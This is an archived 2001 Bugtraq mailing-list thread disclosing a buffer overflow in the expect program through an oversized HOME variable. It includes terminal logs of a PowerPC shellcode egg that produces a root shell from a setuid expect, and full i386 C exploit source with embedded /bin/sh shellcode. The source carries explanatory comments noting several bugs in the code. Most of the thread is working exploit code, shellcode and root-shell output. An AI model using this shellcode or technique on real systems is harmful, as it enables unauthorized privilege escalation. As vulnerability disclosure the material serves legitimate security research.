
Re: [Fwd: [Fwd: Returned post for bugtraq () securityfocus com]]


From: Charles Stevenson <core () ezlink com>
Date: Thu, 07 Jun 2001 19:52:55 -0600

F*#! i sent the wrong paste (lol)... yes the easiest expect exploit if it
was suid would be to call it directly... ;-)

here is the paste i meant to send

[-(core@euclid:~/sploits/shellcode/reet)> ./eggshell 512
[ Buffer size:  512             Egg size:       2048    Aligment:       0]
[ Address:      0x100111f8      Offset:         0                        ]
sh-2.05$ export HOME=$EGG
sh-2.05$ id
uid=1000(core) gid=1000(core) groups=1000(core),4(adm),24(cdrom),29(audio)
sh-2.05$ /usr/bin/expect
sh-2.05# id
uid=0(root) gid=1000(core) groups=1000(core),4(adm),24(cdrom),29(audio)
sh-2.05# ps
  PID TTY          TIME CMD
 1791 pts/5    00:00:00 sh
 1793 pts/5    00:00:00 ps
sh-2.05# exit
sh-2.05$ echo $HOME
ÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûx|Æ2x/?ÿA¼|h¦°Ãÿµ°Ãÿ­°Ãÿ?ÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûx8?ð8¦ô8æó|¥"x|ç"x|?:|Ä®|Ä*|ç(P|?*|¤"|¤*|(P|e|cxDÿÿ|£+x|À3x|Æ2x|§:|¥*|c!.|f"|Å!.|¥*xDÿÿ|à;xDÿÿÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûx|Æ2xKÿþý/bin/shZÿÿÿÿÿÿÿÿ

Assigning the contents of $EGG to $HOME being the key... sorry folks about
the earlier blunder... ;-)

Best Regards,
Charles Stevenson

Charles Stevenson wrote:

Kevin,

Here's the PPC shellcode info you asked for:

This is mainly a post of my PowerPC exploit efforts... anyways... Just
for grins I tested a scenario under Debian PowerPC GNU/Linux with:

ii  expect5.31     5.31.8-3       A program that "talks" to other
programs.

[-(core@euclid:~/sploits/shellcode/reet)> sudo chmod 4755 /usr/bin/expect

[-(core@euclid:~/sploits/shellcode/reet)> ls -lL /usr/bin/expect
-rwsr-xr-x    1 root     root         4328 Sep 20  2000 /usr/bin/expect
[-(core@euclid:~/sploits/shellcode/reet)> ./eggshell 512
[ Buffer size:  512             Egg size:       2048    Aligment:
0]
[ Address:      0x100111f8      Offset:         0
]
sh-2.05$ id
uid=1000(core) gid=1000(core)
groups=1000(core),4(adm),24(cdrom),29(audio)
sh-2.05$ /usr/bin/expect
expect1.1> id
uid=1000(core) gid=1000(core) euid=0(root)
groups=1000(core),4(adm),24(cdrom),29(audio)
expect1.2>

If you find a program that calls expect suid let me know ;-)

Best Regards,
Charles Stevenson

P.S. the "reet" tools I wrote to add PowerPC support are based on Aleph
One's smashstack code.  It's available at:
http://www.ezlink.com/~core/files/reet.tar.gz (Comments welcome:)

I have found an overflow in, and written exploit code for, several
versions of /usr/bin/expect... on SCO, Linux, and BSD variants. I am
unable to think of a situation where this would be useful due to the
fact that expect is not suid...can anyone help me determine if this is
exploitable to obtain root? Perhaps a suid expect script could be
exploited? or maybe something like suid kppp which calls expect as a
helper program?

[root@linux elguapo]# export HOME=`perl -e 'print "A" x 433'`
[root@linux elguapo]# expect
Segmentation fault (core dumped)

-Kevin Finisterre
dotslash () snosoft com
--------------54785D81E19EEAA4D65A5A40
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=us-ascii;
 name="expect.c"
Content-Disposition: inline;
 filename="expect.c"

//krfinisterre () checkfree com or dotslash () snosoft com
//this is output from my brute script...
//722
//Stack pointer: 0xbffffa18
//       Offset: 0x2d3
//  Return addr: 0xbffff745
//stack/brute.sh: line 11:  2190 Illegal instruction     (core dumped)
$3
$L
//723
//Stack pointer: 0xbffffa18
//       Offset: 0x2d4
//  Return addr: 0xbffff744
//sh-2.04#
//note that I was root when I ran this ... expect is not suid

// Size in bytes of the malloc'd buffer that main() installs as $HOME.
// Note that 533 is not a multiple of 4; the 4-byte fill loop in main()
// relies on this value when computing how far it writes.
#define BUFFERSIZE 533

// Reads the current stack pointer on i386: the inline asm copies %esp into
// %eax, which is the integer return register of the i386 ABI. There is no
// C-level return statement, so the function's result is only what the
// compiler happens to leave in %eax between the asm and the epilogue --
// not guaranteed by the language; TODO confirm for the compiler/flags used.
unsigned long sp(void)
{
        __asm__("movl %esp, %eax");
}

// Entry point of the proof-of-concept posted in this thread: builds an
// oversized value, exports it as HOME and launches /usr/bin/expect, which
// (per the messages above) crashes on a long HOME. This is the caller side
// only; the defect under discussion is inside expect's handling of HOME.
//
// argv[1] is passed straight to atoi() with no argc check, so running the
// program without arguments dereferences argv[1] == NULL.
//
// No #include lines appear in this listing; malloc, printf, exit, strlen,
// setenv and execlp therefore rely on implicit declarations, which C89-era
// compilers accept but C99 and later reject.
int main(int argc,char **argv)
{
  // Byte string copied verbatim into the middle of the buffer below; the
  // last seven bytes are "/bin/sh". It is not interpreted by this program.
  char hell[] =
        "\x29\xc0"
        "\x29\xc0"
        "\xb0\x47"
        "\x29\xdb"
        "\xb3\x0c"
        "\x89\xd9"
        "\xcd\x80"
        "\x5e"
        "\x29\xc0"
        "\x88\x46\x07"
        "\x89\x46\x0c"
        "\x89\x76\x08"
        "\xb0\x0b"
        "\x87\xf3"
        "\x8d\x4b\x08"
        "\x8d\x53\x0c"
        "\xcd\x80"
        "\xe8\xe3\xff\xff\xff"
        "\x2f\x62\x69\x6e\x2f\x73\x68";
        int i;
        int offset;          // taken from argv[1], unchecked
        long esp;            // stack pointer sampled via sp()
        long ret;            // esp - offset; the value repeated through the buffer
        long *addr_ptr;
        char *buffer, *ptr;
        offset = atoi(argv[1]);
        esp = sp();
        ret = esp-offset;

        // exit(-1) is reported to the shell as status 255.
        if(!(buffer = malloc(BUFFERSIZE)))
        {
                printf("oops\n");
                exit(-1);
        }

        // Fill the whole buffer with copies of `ret`, advancing a long
        // pointer while counting i in steps of 4 (assumes 4-byte long, i.e.
        // i386). BUFFERSIZE is 533, not a multiple of 4, so the last
        // iteration (i == 532) stores 4 bytes ending at offset 535: a
        // 3-byte write past the end of the malloc'd block.
        ptr = buffer;
        addr_ptr = (long *)ptr;
        for (i=0; i<BUFFERSIZE; i+=4)
                *(addr_ptr++) = ret;

        // Overwrite the first half with one repeated byte. '\xeb02' is a
        // single hex escape (\x consumes every following hex digit), so its
        // value is 0xeb02, which does not fit in a char; the byte actually
        // stored is compiler-dependent (gcc warns "hex escape sequence out
        // of range").
        for (i=0; i<BUFFERSIZE/2; i++)
                buffer[i] = '\xeb02';

        // Place `hell` (without its terminating NUL) centred in the buffer.
        ptr = buffer + ((BUFFERSIZE/2) - (strlen(hell)/2));
        for(i=0; i<strlen(hell); i++)
                *(ptr++) = hell[i];

        // NUL-terminate so setenv() sees a C string of BUFFERSIZE-1 bytes.
        buffer[BUFFERSIZE-1] = 0;

        // The oversized value reaches expect only through the environment.
        // execlp's variadic argument list is terminated with a plain int 0
        // rather than (char *)NULL, which is not portable: the sentinel must
        // be a null pointer. execlp returns only on failure, and that case
        // is not handled -- main falls off the end without a return value.
        setenv("HOME", buffer, 1);
        execlp("/usr/bin/expect", 0);
}

--------------54785D81E19EEAA4D65A5A40--

